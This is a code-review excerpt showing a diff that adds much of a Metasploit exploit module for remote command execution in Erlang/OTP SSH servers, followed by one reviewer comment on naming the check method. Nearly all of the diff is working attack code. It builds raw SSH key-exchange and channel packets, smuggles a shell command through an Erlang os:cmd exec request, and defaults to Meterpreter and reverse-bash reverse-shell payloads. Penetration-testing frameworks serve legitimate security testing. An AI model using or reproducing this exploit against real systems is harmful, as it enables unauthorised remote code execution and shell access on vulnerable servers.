modules/exploits/linux/ssh/ssh_erlangotp_rce.rb

```diff
@@ -0,0 +1,261 @@
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Platform' => 'linux',
+              'Arch' => ARCH_CMD,
+              'Type' => :linux_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/https/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command', {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2025-04-16',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptBool.new('CHECK_ONLY', [false, 'Only check for vulnerability without exploiting', false])
+    ])
+  end
+
+  # builds SSH_MSG_CHANNEL_OPEN for session
+  def build_channel_open(channel_id)
+    "\x5a" +
+      string_payload('session') +
+      [channel_id].pack('N') +
+      [0x68000].pack('N') +
+      [0x10000].pack('N')
+  end
+
+  # builds SSH_MSG_CHANNEL_REQUEST with 'exec' payload
+  def build_channel_request(channel_id, command)
+    "\x62" +
+      [channel_id].pack('N') +
+      string_payload('exec') +
+      "\x01" +
+      string_payload("os:cmd(\"#{command}\").")
+  end
+
+  # builds a minimal but valid SSH_MSG_KEXINIT packet
+  def build_kexinit
+    cookie = "\x00" * 16
+    "\x14" +
+      cookie +
+      name_list(
+        [
+          'curve25519-sha256',
+          'ecdh-sha2-nistp256',
+          'diffie-hellman-group-exchange-sha256',
+          'diffie-hellman-group14-sha256'
+        ]
+      ) +
+      name_list(['rsa-sha2-256', 'rsa-sha2-512']) +
+      name_list(['aes128-ctr']) * 2 +
+      name_list(['hmac-sha1']) * 2 +
+      name_list(['none']) * 2 +
+      name_list([]) * 2 +
+      "\x00" +
+      [0].pack('N')
+  end
+
+  def message(msg)
+    "ssh://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}"
+  end
+
+  # formats a list of names into an SSH-compatible string (comma-separated)
+  def name_list(names)
+    string_payload(names.join(','))
+  end
+
+  # pads a packet to match SSH framing
+  def pad_packet(payload, block_size)
+    min_padding = 4
+    payload_length = payload.length
+    padding_len = block_size - ((payload_length + 5) % block_size)
+    padding_len += block_size if padding_len < min_padding
+    [(payload_length + 1 + padding_len)].pack('N') +
+      [padding_len].pack('C') +
+      payload +
+      "\x00" * padding_len
+  end
+
+  # helper to format SSH string (4-byte length + bytes)
+  def string_payload(str)
+    s_bytes = str.encode('utf-8')
+    [s_bytes.length].pack('N') + s_bytes
+  end
+
+  def check_host(target_host)
```

Comment:
In exploit modules the check method should be named just `check`. 
```suggestion
  def check(target_host)
```

Reply:
Removed